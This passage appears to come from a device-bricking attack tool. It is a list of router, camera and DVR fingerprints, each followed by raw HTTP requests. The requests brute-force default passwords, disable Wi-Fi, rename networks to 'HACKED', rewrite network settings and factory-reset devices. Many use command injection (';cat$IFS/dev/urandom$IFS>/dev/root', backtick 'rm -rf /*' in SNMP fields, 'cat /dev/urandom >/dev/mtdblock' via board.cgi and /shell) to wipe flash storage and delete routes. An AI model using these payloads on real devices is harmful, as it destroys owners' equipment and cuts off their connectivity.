 'POST /goform/APSecurity HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nssidIndex=1&SSIDEnable=disable&bssid_num=1&ssidName=HACKED&secure_WMM=1&security_mode=WPAPSKWPA2PSK&security_shared_mode=WEP&wep_default_key=1&WEP1=&WEP1Select=1&WEP2=&WEP2Select=1&WEP3=&WEP3Select=1&WEP4=&WEP4Select=1&cipher=2&passphrase=DefaultPasswordsSuck&PreAuthentication=1&RadiusServerIP=&RadiusServerPort=&RadiusServerSecret=&RadiusServerSessionTimeout=&RadiusServerIdleTimeout=&access_mode=0&addmac=' ,
6498
 'GET /lang/en/wireless.xml HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\n\r\n' ,
6499
 'GET /management/account_self_admin.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\n\r\n' ,
6500
'POST /goform/WanCfg HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nwan_enable=0&wan_connectionmode=100&wan_connectionType=0&wan_vid=1030&wan_priority=0&nat_enable=0&dns_enable=0&wan_mtu=1500&wan_feBox=1&wan_ssidBox=1&wan_ssidBox=4&ipv6_enable=0&ipModel=0&AFTR_value=&staticIp=&staticNetmask=&staticGateway=&staticPriDns=&staticSecDns=&staticIp_ipv6=&Prefix_Length=&IPv6_Gateway=&IPv6_Pri_DNS=&IPv6_Sec_DNS=&Address%2FPrefix_static=2&Prefix_static=2&IPv6_prefix=&Address%2FPrefix_dhcp=0&Prefix_dhcp=0&pppoeUser=&pppoePass=&pppoeOPMode=0&pppoeRetryPeriod=&Address%2FPrefix_pppoe=1&Prefix_pppoe=0&wApply=Apply&fw_curIndex=0' ,
6501
 'POST /goform/reboot HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: loginName=%%LOGIN%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\n:""' ,
6502
 'GET / HTTP/1.0\r\n\r\n' ,
6503
 ] ,
6504
[ 'foscamold' , 'Server: Netwave IP Camera' ,
6505
 'GET /camera_control.cgi?param=1&user=admin&pwd=&value=0 HTTP/1.0\r\nAuthorization: Basic YWRtaW46\r\n\r\n' ,
6506
 'GET /camera_control.cgi?param=2&user=admin&pwd=&value=0 HTTP/1.0\r\nAuthorization: Basic YWRtaW46\r\n\r\n' ,
6507
 'GET /camera_control.cgi?param=5&user=admin&pwd=&value=3 HTTP/1.0\r\nAuthorization: Basic YWRtaW46\r\n\r\n' ,
6508
 'GET /set_network.cgi?next_url=rebootme.htm&user=admin&pwd=&ip=10.%%RAND8%%&mask=255.255.255.0&gateway=10.%%COMP8%%&dns=1.2.3.4&port=%%RANDPORT%% HTTP/1.0\r\nAuthorization: Basic YWRtaW46\r\n\r\n' ,
6509
 'GET /set_wifi.cgi?next_url=rebootme.htm&channel=5&user=admin&pwd=admin&enable=0&ssid=&mode=0&encrypt=0&authtype=0&keyformat=0&defkey=0&key1=&key2=&key3=&key4=&key1_bits=0&key2_bits=0&key3_bits=0&key4_bits=0&wpa_psk= HTTP/1.0\r\nAuthorization: Basic YWRtaW46\r\n\r\n' ,
6510
 'GET /set_pppoe.cgi?next_url=rebootme.htm&enable=0&user=admin&pwd= HTTP/1.0\r\nAuthorization: Basic YWRtaW46\r\n\r\n' ,
6511
 'GET /reboot.cgi?next_url=reboot.htm&user=admin&pwd= HTTP/1.0\r\nAuthorization: Basic YWRtaW46\r\n\r\n' ,
6512
 'GET /restore_factory.cgi?next_url=reboot.htm&user=admin&pwd= HTTP/1.0\r\nAuthorization: Basic YWRtaW46\r\n\r\n' ,
6513
 'GET / HTTP/1.0\r\n\r\n' ,
6514
 ] ,
6515
[ 'telkomdlink' , '^(105\.18[4567]|105\.22[456789])\.\d+\.\d+%%%.*Server: microhttpd.*Set-Cookie: Name=;' ,
6516
 'POST /index.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nusername=support&password=TelkomDlink12345&validateCode=' ,
6517
'GET /internet.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: Name=\r\n\r\n' ,
6518
'GET /wlcfg.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: Name=\r\nReferer: http://%%TARGETIP%%/internet.html\r\n\r\n' ,
6519
 'GET /wlcfg.wl?wlSsidIdx=0&wlEnbl=0&wlHide=0&wlAPIsolation=0&wlSsid=TELKOMHACKED&wlCountry=ZA&wlEnbl_wl0v1=0&wlEnbl_wl0v2=0&wlEnbl_wl0v3=0&wsc_config_state=1&wlSyncNvram=1&sessionKey=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: Name=\r\n\r\n' ,
6520
'GET /setup_wancfg.html HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: Name=\r\n\r\n' ,
6521
 'GET /dlwancfg.cmd?action=remove&rmLst=ppp0.1&sessionKey=%%CUSTOM1%% HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: Name=\r\n\r\n' ,
6522
 'GET / HTTP/1.0\r\n\r\n' ,
6523
 ] ,
6524
[ 'aztechweb' , 'K;Content-type: text/html;charset=ISO-8859-1.*domtabadv\.css' ,
6525
 'GET /cgi-bin/login.cgi?username=admin&password=admin HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6526
 'GET /cgi-bin/login.cgi?username=admin&password=bayandsl HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6527
 'GET /cgi-bin/login.cgi?username=admin&password=epicrouter HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6528
 'GET /cgi-bin/login.cgi?username=admin&password=password HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6529
 'GET /cgi-bin/login.cgi?username=admin&password= HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6530
 'POST /cgi-bin/netLan.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: SESSIONID=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsaveFlag=1&lan_VC=0&lan_Alias_VC=0&aliasFlag=No&defaultRoute=0&defaultRoute_isp=2&staticNum=0&delnum=&tmpStartIp=10.0.0.3&tmpPoolCount=252&option60Flag=No&isIPv6Supported=0&ipv6Flag=0&lan2Wan=No&dhcpethdis=No&dhcpethen=Yes&uiViewIPAddr=10.%%RAND8%%&dhcpFlag=0&lanFlag=0&DNSproxy=Yes&uiViewNetMask=255.255.255.0&dhcpTypeRadio=1&StartIp=10.0.0.3&PoolSize=252&dhcp_LeaseTime=86400&dnsTypeRadio=0' ,
6531
 'POST /cgi-bin/wlBasic.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: SESSIONID=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsaveFlag=1&N_wlan_APenable=0&BasicRate_Value1=15&BasicRate_Value2=3&BasicRate_Value3=351&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&HTMCSAUTO=33&HTBW=0&WPSConfigured=2&WpsConfModeAll=7&WpsConfModeNone=0&Is11nMode=1&ExtChannFlag=0&isInWPSing=0&CountryName=SOUTH+AFRICA&BssidNum=1&WpsStart=0&WpsOOB=0&BUTTON=SAVE&wlanWEPFlag=3&ESSID=HACKED&bssid_num=1&ESSID_HIDE_Selection=0&WirelessMode=9&BeaconInterval=100&DTIM=1&FragmentThreshold=2346&RTSThreshold=2347&Countries_Channels=SOUTH+AFRICA&Channel_ID=6&WLANChannelBandwidth=1&WLANGuardInterval=1&WLANMCS=33&WLANExtensionChannel=0&CountryChange=0' ,
6532
 'POST /cgi-bin/quickstart.asp HTTP/1.1\r\nHost: %%TARGETIP%%\r\nCookie: SESSIONID=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\npage=home.asp&saveFlag=1&wanVCFlag=&vEnable=0&vSSID=0&timeType=0&AuthMode=WPAPSKWPA2PSK&TKIP_Selection=TKIPAES&TypeFlag=2&commit=1&select=PPPoE+LLC&wan_VCStatus=Yes&ATM_QoS=ubr&ATM_PCR=0&ATM_SCR=0&ATM_MBS=0&wan_NAT=Enable&wan_DefaultRoute=Yes&wan_TCPMTU=0&wan_RIPVersion=RIP1&wan_RIPDirection=None&wan_IGMP=Disabled&wan_ConnectSelect=Connect_Keep_Alive&wan_IdleTimeT=&wan_TCPMSS=0&wan_PPPGetIP=Dynamic&wan_StaticIPaddr=&wan_StaticIPSubMask=&wan_StaticIpGateway=&N_linktype=eth0.4&N_macEnbl=0&N_clonemac=N%2FA&ftthPVC=7&ftthDefRoute=No&wan7ifname=eth0.4&wan_VC=0&wan7Active=Yes&lan2Wan=Yes&dhcpethdis=No&lan_VC=0&dhcpTypeRadio=1&uiViewdateTZ=GMT%2B03%3A00&uiViewSNTPServer=igubu.saix.net&Custom_NTP_Server=igubu.saix.net&daylight=Disable&wan_connType=WAN&3g_apnMeth=list&3g_countryList=0&3g_opList=0&3g_apnList=0&3g_apn=&3g_authType=0&netType=AUTO&3g_connMethod=1&3g_idleTimeout=N%2FA&3g_umtsdialnumber=*99%23&3g_umtsusername=&3g_umtspassword=&3g_umtscpin=&conn_type=1&uiViewUserNameMark=guest%40telkomadsl&uiViewPasswordMark=guest&wzStatic_IPaddr=&wzStatic_SubMask=&wzStatic_GatewayAdd=&dns1=&dns2=&wzDHCP_VPI=8&wzDHCP_VCI=35&ESSID_HIDE_Selection=on&wireless_ssid=HACKED&wpaenable=on&PreSharedKey=802325481036364884' ,
6533
 'GET / HTTP/1.0\r\n\r\n' ,
6534
 ] ,
6535
 [ 'netgeardgn1022' , '(NETGEAR DGN1000|NETGEAR DGN2200)' ,
6536
 'GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/dev/urandom+>/dev/root&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n\r\n' ,
6537
 'GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=route+del+default&curpath=/&currentsetting.htm=1 HTTP/1.0\r\n\r\n' ,
6538
 'GET / HTTP/1.0\r\n\r\n' ,
6539
 ] ,
6540
[ 'netgearr7064' , '(NETGEAR R7000|NETGEAR R6400)' ,
6541
 'GET /cgi-bin/;cat$IFS/dev/urandom$IFS>/dev/root HTTP/1.0\r\n\r\n' ,
6542
 'GET /cgi-bin/;route$IFSdel$IFSdefault HTTP/1.0\r\n\r\n' ,
6543
 'GET / HTTP/1.0\r\n\r\n' ,
6544
 ] ,
6545
[ 'vacron' , '(VACRON NVR|Boa.*title>DVR LOGIN<\/ti)' ,
6546
 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock0 HTTP/1.0\r\n\r\n' ,
6547
 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock9 HTTP/1.0\r\n\r\n' ,
6548
 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock10 HTTP/1.0\r\n\r\n' ,
6549
 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/sda1 HTTP/1.0\r\n\r\n' ,
6550
 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock1 HTTP/1.0\r\n\r\n' ,
6551
 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock2 HTTP/1.0\r\n\r\n' ,
6552
 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock3 HTTP/1.0\r\n\r\n' ,
6553
 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock4 HTTP/1.0\r\n\r\n' ,
6554
 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock5 HTTP/1.0\r\n\r\n' ,
6555
 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock6 HTTP/1.0\r\n\r\n' ,
6556
 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock7 HTTP/1.0\r\n\r\n' ,
6557
 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/mtdblock8 HTTP/1.0\r\n\r\n' ,
6558
 'GET /board.cgi?cmd=cat%20/dev/urandom%20>/dev/root HTTP/1.0\r\n\r\n' ,
6559
 'GET /board.cgi?cmd=route%20del%20default HTTP/1.0\r\n\r\n' ,
6560
 'GET / HTTP/1.0\r\n\r\n' ,
6561
 ] ,
6562
[ 'jaws' , 'Server: JAWS' ,
6563
 'GET /shell?cat%20/dev/urandom%20%3E/dev/sda1 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' ,
6564
 'GET /shell?cat%20/dev/urandom%20%3E/dev/sda2 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' ,
6565
 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock0 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' ,
6566
 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock1 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' ,
6567
 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock2 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' ,
6568
 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock3 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' ,
6569
 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock4 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' ,
6570
 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock5 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' ,
6571
 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock0 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' ,
6572
 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock1 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' ,
6573
 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock2 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' ,
6574
 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock3 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' ,
6575
 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock4 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' ,
6576
 'GET /shell?cat%20/dev/urandom%20%3E/dev/mtdblock5 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' ,
6577
 'GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%220%22%20squ=%22abcdefg%22%20dir=%220%22%20enc=%221%22%3E%3Cenvload%20type=%221%22%20usr=%22admin%22%20pwd=%22%22%3E%3Cscreen%20chn=%220%22%20title=%22HACKED%22/%3E%3Ccopyg%20chn=%220%22%20type=%225%22%20channels=%22255%22/%3E%3C/envload%3E%3C/juan%3E&_=1510387268908 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\nCookie: dvr_camcnt=8; dvr_clientport=80; dvr_sensorcnt=4; lxc_save=admin%2C; dvr_usr=admin; dvr_pwd=null; iSetAble=1; iPlayBack=1\r\n\r\n' ,
6578
 'GET /cgi-bin/gw.cgi?xml=%3Cjuan%20ver=%220%22%20squ=%22abcdefg%22%20dir=%220%22%20enc=%221%22%3E%3Cenvload%20type=%221%22%20usr=%22admin%22%20pwd=%22%22%3E%3Cnetwork%20ip=%2210.%%RAND8%%%22%20gateway=%2210.%%COMP8%%%22%20dns=%2210.%%COMP8%%%22%20enetid=%2221391293%22%20pppoe=%221%22%20pppoeusr=%22HACKED%22%20pppoepwd=%22HACKED%22/%3E%3C/envload%3E%3C/juan%3E&_=1510387452140 HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\nCookie: dvr_camcnt=8; dvr_clientport=80; dvr_sensorcnt=4; lxc_save=admin%2C; dvr_usr=admin; dvr_pwd=null; iSetAble=1; iPlayBack=1\r\n\r\n' ,
6579
 'GET /shell?route%20del%20default HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' ,
6580
 'GET /shell?cat%20/dev/urandom%20%3E/dev/mem HTTP/1.1\r\nHost:%%TARGETIP%%:%%TARGETPORT\r\n\r\n' ,
6581
 'GET / HTTP/1.0\r\n\r\n' ,
6582
 ] ,
6583
[ 'readynas' , 'Apache.*Debian.*Location:\shttp:\S+/admin;Vary' ,
6584
 'GET / HTTP/1.0\r\n\r\n' ,
6585
 ] ,
6586
[ 'mediatekajax' , 'Server: lighttpd/1.*style\.css.*ion\sinit\(\).*ion\sfFOB\(o\).*' ,
6587
 'POST /ajax.cgi?action=login HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUI_ADMIN_USERNAME=admin&UI_ADMIN_PASSWORD=admin' ,
6588
 'POST /ajax.cgi?action=login HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUI_ADMIN_USERNAME=admin&UI_ADMIN_PASSWORD=admin123' ,
6589
 'POST /ajax.cgi?action=login HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUI_ADMIN_USERNAME=admin&UI_ADMIN_PASSWORD=admin1234' ,
6590
 'POST /ajax.cgi?action=login HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUI_ADMIN_USERNAME=admin&UI_ADMIN_PASSWORD=password' ,
6591
 'POST /ajax.cgi?action=login HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUI_ADMIN_USERNAME=user&UI_ADMIN_PASSWORD=user' ,
6592
 'POST /ajax.cgi?action=login HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nUI_ADMIN_USERNAME=guest&UI_ADMIN_PASSWORD=guest' ,
6593
'POST /ajax.cgi?action=net_dhcp HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsid=%%CUSTOM1%%&DHCPD_STATIC_LEASE=&DHCPD_ENABLE=0&DHCPD_START_IP_01=10&DHCPD_START_IP_02=1&DHCPD_START_IP_03=1&DHCPD_START_IP_04=1&DHCPD_START_IP=&DHCPD_END_IP_01=10&DHCPD_END_IP_02=1&DHCPD_END_IP_03=1&DHCPD_END_IP_04=100&DHCPD_END_IP=&DNS_IP_1=&DNS_IP_2=&DNS_IP_3=&DHCPD_LEASE_TIME=1440&btnSubmit=1&DHCPD_DNS=&ippt_enable=0&IPPT_EXCEPTION=1%2CY%2C1%2C1%2C68%2C67%2CDHCP+request+from+lan%3B2%2CY%2C2%2C1%2C67%2C68%2CDHCP+response+from+wan%3B&IPPT_EXCEPTION_NUM=2' ,
6594
 'POST /ajax.cgi?action=net_lan HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsid=%%CUSTOM1%%&LAN_IP_01=10&LAN_IP_02=%%RAND81%%&LAN_IP_03=%%RAND82%%&LAN_IP_04=%%RAND83%%&LAN_IP=10.%%RAND8%%&LAN_MASK_01=255&LAN_MASK_02=255&LAN_MASK_03=255&LAN_MASK_04=254&LAN_MASK=255.255.255.254&btnSubmit=1' ,
6595
 'POST /ajax.cgi?action=net_bridge_nat_mode HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsid=%%CUSTOM1%%&LAN_IP_01=10&LAN_IP_02=%%RAND81%%&LAN_IP_03=%%RAND82%%&LAN_IP_04=%%RAND83%%&LAN_IP=10.%%RAND8%%&LAN_MASK_01=255&LAN_MASK_02=255&LAN_MASK_03=255&LAN_MASK_04=254&LAN_MASK=255.255.255.254&LAN_MTU=1500&WAN_OP_MODE=0&WAN_TYPE=0&WAN_IP=&WAN_MASK=&WAN_GATEWAY=&WAN_MTU=1400&dns_type_1=1&DNS_IP_1_01=0&DNS_IP_1_02=0&DNS_IP_1_03=0&DNS_IP_1_04=0&DNS_IP_1=&dns_type_2=1&DNS_IP_2_01=0&DNS_IP_2_02=0&DNS_IP_2_03=0&DNS_IP_2_04=0&DNS_IP_2=&dns_type_3=1&DNS_IP_3_01=0&DNS_IP_3_02=0&DNS_IP_3_03=0&DNS_IP_3_04=0&DNS_IP_3=&btnSubmit=1&WAN_DNS=1%2C0.0.0.0+1%2C0.0.0.0+1%2C0.0.0.0' ,
6596
'POST /ajax.cgi?action=manage_snmp HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsid=%%CUSTOM1%%&SNMPD_ENABLE=1&ROCOMMUNITY=%60rm+-rf+/*%60&RWCOMMUNITY=&SYSCONTACT=&SYSLOCATION=&btnSubmit=1' ,
6597
'POST /ajax.cgi?action=net_ddns HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nsid=%%CUSTOM1%%&DDNS_ENABLE=on&DDNS_PROVIDER=0&DDNS_TYPE=0&DDNS_HOST=%60reboot%60&DDNS_DOMAIN=hacked&DDNS_USERNAME=hacked&DDNS_PASSWORD=hacked&btnSubmit=1' ,
6598
'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6599
 ] ,
6600
[ 'mediatekwimax' , '302 Found.*Server: httpd.*Location: login.html' ,
6601
 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=admin&PASSWORD=admin' ,
6602
 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=user&PASSWORD=user' ,
6603
 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=guest&PASSWORD=guest' ,
6604
 'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=guest&PASSWORD=linkem123' ,
6605
'GET /index.html?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' ,
6606
'POST /user.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=net-lan.html&SERVICE=dhcpd&DHCPD_STATIC_LEASE=&DHCPD_DNS=0%2C0.0.0.0+1%2C0.0.0.0+1%2C0.0.0.0&DHCPD_ENABLE=0&DHCPD_START_IP=192.168.0.2&DHCPD_END_IP=192.168.0.254&DHCPD_LEASE_TIME=1440&DHCPD_RELAY_IP=0.0.0.0&First_Type=1&Second_Type=1&Third_Type=1' ,
6607
'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%' ,
6608
'GET /index.html?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' ,
6609
'POST /mtk.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=wifi-wlan.MT5921.html&SERVICE=wifi&SLEEP=7&WLAN_WifiEnable=0&WLAN_WscAction=&WLAN_WscConfMode=&WLAN_AuthMode=&WLAN_DefaultKeyID=1%3B1%3B&WLAN_EncrypType=&WLAN_GenPin=&WLAN_WscConfStatus=1&WLAN_SSID1=HACKED&WLAN_SSID2=MTK2' ,
6610
'POST /user.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=wifi-wlan.MT5921.html&SERVICE=wifi&SLEEP=7&WLAN_WifiEnable=0&WLAN_WscAction=&WLAN_WscConfMode=&WLAN_AuthMode=&WLAN_DefaultKeyID=1%3B1%3B&WLAN_EncrypType=&WLAN_GenPin=&WLAN_WscConfStatus=1&WLAN_SSID1=HACKED&WLAN_SSID2=MTK2' ,
6611
'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%' ,
6612
'GET /index.html?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' ,
6613
'POST /user.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=adv-nat.html&SERVICE=netfilter_dmz&NETFILTER_DMZ_ENABLE=1&NETFILTER_DMZ_HOST=8.8.8.8' ,
6614
'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%' ,
6615
'GET /index.html?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' ,
6616
'POST /user.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=net-lan.html&SLEEP=3&SERVICE=networking_lan&LAN_IP=10.%%RAND16%%&LAN_MASK=255.255.255.254' ,
6617
'POST /voip_ip_zyims.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=zysc-acct.html%3Find%3D1&SERVICE=sc&SUC_RET=3&ACTION=disconnect&ACCT=1' ,
6618
 'POST /voip_ip_zyims.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=zysc-acct.html%3Find%3D1&SERVICE=sc&SUC_RET=3&ACTION=disconnect&ACCT=2' ,
6619
'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%' ,
6620
'GET /index.html?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' ,
6621
 'POST /mtk.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=sys-log.html&SLEEP=1&SERVICE=sysklogd&SYSLOGD_LOG_ENABLE=1&SYSLOGD_REMOTE_LOG=1&LOG_ENABLE=on&SYSLOGD_LOG_LEVEL=7&REMOTE_LOG=on&SYSLOGD_REMOTE_HOST=%60reboot%60&SYSLOGD_REMOTE_PORT=514' ,
6622
'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%' ,
6623
'GET /index.html?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' ,
6624
'POST /user.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nWWW_SID=%%CUSTOM1%%&REDIRECT=net-ddns.html&DDNS_ENABLE=1&DDNS_WILDCARD=1&DDNS_BACKUP_MX=0&DDNS_MX=0&SERVICE=ddns&DDNS_PROVIDER=0&DDNS_TYPE=0&DDNS_HOST=%60reboot%60&DDNS_DOMAIN=hacked&DDNS_USERNAME=hacked&DDNS_PASSWORD=hacked&DDNS_IPPOLICY=0' ,
6625
'POST /login.cgi HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nID=%%LOGIN%%&PASSWORD=%%PASSWORD%%' ,
6626
'GET /index.html?WWW_SID=%%CUSTOM1%% HTTP/1.0\r\n\r\n' ,
6627
